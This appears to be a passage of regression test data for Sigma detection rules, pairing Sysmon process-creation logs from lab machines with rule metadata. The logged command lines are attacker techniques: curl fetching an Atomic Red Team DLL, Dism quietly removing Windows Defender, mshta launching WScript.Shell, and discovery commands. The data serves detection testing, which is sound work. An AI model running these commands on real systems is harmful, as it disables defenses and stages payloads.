    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-11T06:51:23.281436Z\"\n        }\n      },\n      \"EventRecordID\": 21706,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-11 06:51:23.255\",\n      \"ProcessGuid\": \"0197231E-69EB-693A-1313-000000000800\",\n      \"ProcessId\": 13896,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.10.1\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  file:///C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml",
    "content": "id: 4dfcc9a3-f555-4692-aa17-bca049de2f61\ndescription: N/A\ndate: 2025-12-11\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: aa6f6ea6-0676-40dd-b510-6e46f02d8867\n      title: Local File Read Using Curl.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:23:21.381915Z\"\n        }\n      },\n      \"EventRecordID\": 8613670,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:23:21.362\",\n      \"ProcessGuid\": \"5AA13A44-CF49-68FC-2630-000000004002\",\n      \"ProcessId\": 9032,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\curl.exe\",\n      \"FileVersion\": \"8.13.0\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"curl  -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\\\users\\\\public\\\\music\\\\allthethingsx64.dll\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=A1BD7848E36F22021C68F4F24EDFDB7ACE42FCA3,MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/info.yml",
    "content": "id: e2254736-78df-48bf-acd9-e36f914e21bc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468\n      title: Suspicious Curl.EXE Download\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/85f520e7-6f5e-43ca-874c-222e5bf9c0de.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-23T03:54:56.824925Z\"\n        }\n      },\n      \"EventRecordID\": 23370,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-01-23 03:54:56.816\",\n      \"ProcessGuid\": \"0197231E-F110-6972-3D16-000000000800\",\n      \"ProcessId\": 12132,\n      \"Image\": \"C:\\\\Program Files (x86)\\\\Windows Kits\\\\10\\\\Tools\\\\10.0.26100.0\\\\x64\\\\devcon.exe\",\n      \"FileVersion\": \"10.0.26100.6584 (WinBuild.160101.0800)\",\n      \"Description\": \"Device Console\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"DevCon.exe\",\n      \"CommandLine\": \"devcon.exe  disable \\\"ROOT\\\\VMWVMCIHOSTDEV\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Program Files (x86)\\\\Windows Kits\\\\10\\\\Tools\\\\10.0.26100.0\\\\x64\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=36A56121DBE964347C859F95E996B26F,SHA256=282FF232C35FCB82DAD2FDAE56C775523409494B175A5A83D7441B5FA65CB3F9,IMPHASH=A0225EB3236EA941773B705076ADA2AF\",\n      \"ParentProcessGuid\": \"0197231E-F0B6-6972-3816-000000000800\",\n      \"ParentProcessId\": 4244,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/info.yml",
    "content": "id: 00d836cd-522f-41c8-b6a5-e1bf5d1d388d\ndescription: N/A\ndate: 2026-01-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 85f520e7-6f5e-43ca-874c-222e5bf9c0de\n      title: Devcon Execution Disabling VMware VMCI Device\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/85f520e7-6f5e-43ca-874c-222e5bf9c0de.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:41:03.540138Z\"\n        }\n      },\n      \"EventRecordID\": 8933629,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:41:03.533\",\n      \"ProcessGuid\": \"5AA13A44-D36F-68FC-CE30-000000004002\",\n      \"ProcessId\": 5956,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\DirLister.exe\",\n      \"FileVersion\": \"2.0.0.0\",\n      \"Description\": \"DirLister.UI\",\n      \"Product\": \"DirLister.UI\",\n      \"Company\": \"DirLister\",\n      \"OriginalFileName\": \"DirLister.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\DirLister.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=561771830EDE663651F3E6D731656D5D9E2BB19A,MD5=909E97D239C54B4563B61573FAE63C22,SHA256=C939927D7AB06E05B1B6E4951E8F7C45E54BA4EC3CA9399D7E1D9F5CA67C849C,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\",\n      \"ParentProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ParentProcessId\": 7680,\n      \"ParentImage\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\explorer.exe\\\" /NoUACCheck\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/info.yml",
    "content": "id: 3e64088e-d05c-4e03-ac62-d5961672d33e\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: b4dc61f5-6cce-468e-a608-b48b469feaa2\n      title: DirLister Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:44:33.440907Z\"\n        }\n      },\n      \"EventRecordID\": 8999629,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:44:33.433\",\n      \"ProcessGuid\": \"5AA13A44-D441-68FC-E330-000000004002\",\n      \"ProcessId\": 7112,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg  query \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\" /v CurrentBuildNumber\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=E65FAA187D27D84106B78B909C06D405837EC64E,MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml",
    "content": "id: 23b1ddfe-cb7d-4e2f-9ae3-d96eabe0f6e1\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 0022869c-49f7-4ff2-ba03-85ac42ddac58\n      title: System Information Discovery via Registry Queries\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:47:34.903176Z\"\n        }\n      },\n      \"EventRecordID\": 9055342,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:47:34.894\",\n      \"ProcessGuid\": \"5AA13A44-D4F6-68FC-F430-000000004002\",\n      \"ProcessId\": 7808,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\Dism.exe\",\n      \"FileVersion\": \"10.0.20348.2849 (WinBuild.160101.0800)\",\n      \"Description\": \"Dism Image Servicing Utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"DISM.EXE\",\n      \"CommandLine\": \"Dism  /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=0AABFEC24BA5FC8806492DCCE89094743219EDE4,MD5=0B1CB657FF6BF807D830A5B970ECC041,SHA256=1B1EC450CE9B4559C6A2AE8ED5D8715F5135BE20257DC84ED11EBB814F29A1F2,IMPHASH=7B40129B2F7F51468E0954D5A44D9CDD\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/info.yml",
    "content": "id: b4459771-0fe5-4777-be95-ea6fce92d1fc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 43e32da2-fdd0-4156-90de-50dfd62636f9\n      title: Dism Remove Online Package\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:53:43.425641Z\"\n        }\n      },\n      \"EventRecordID\": 33534161,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:53:43.425\",\n      \"ProcessGuid\": \"5AA13A44-B487-68FE-7F5F-000000004002\",\n      \"ProcessId\": 2052,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\driverquery.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Queries the drivers on a system\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"drvqry.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\driverquery.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Windows\\\\Temp\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461\",\n      \"ParentProcessGuid\": \"5AA13A44-B487-68FE-7E5F-000000004002\",\n      \"ParentProcessId\": 11360,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\mshta.exe\",\n      \"ParentCommandLine\": \"mshta  \\\"javascript:new ActiveXObject('WScript.Shell').Run('driverquery.exe');close();\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/info.yml",
    "content": "id: 585f7fa9-392b-4609-b324-4701482de7ec\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd\n      title: Potential Recon Activity Using DriverQuery.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:47:36.476583Z\"\n        }\n      },\n      \"EventRecordID\": 33403755,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:47:36.462\",\n      \"ProcessGuid\": \"5AA13A44-B318-68FE-4B5F-000000004002\",\n      \"ProcessId\": 8840,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\driverquery.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Queries the drivers on a system\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"drvqry.exe\",\n      \"CommandLine\": \"driverquery\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/info.yml",
    "content": "id: 13b0c2d7-2056-4ce4-85df-79f7e499dd49\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: a20def93-0709-4eae-9bd2-31206e21e6b2\n      title: DriverQuery.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T13:48:36.392892Z\"\n        }\n      },\n      \"EventRecordID\": 9075053,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 13:48:36.383\",\n      \"ProcessGuid\": 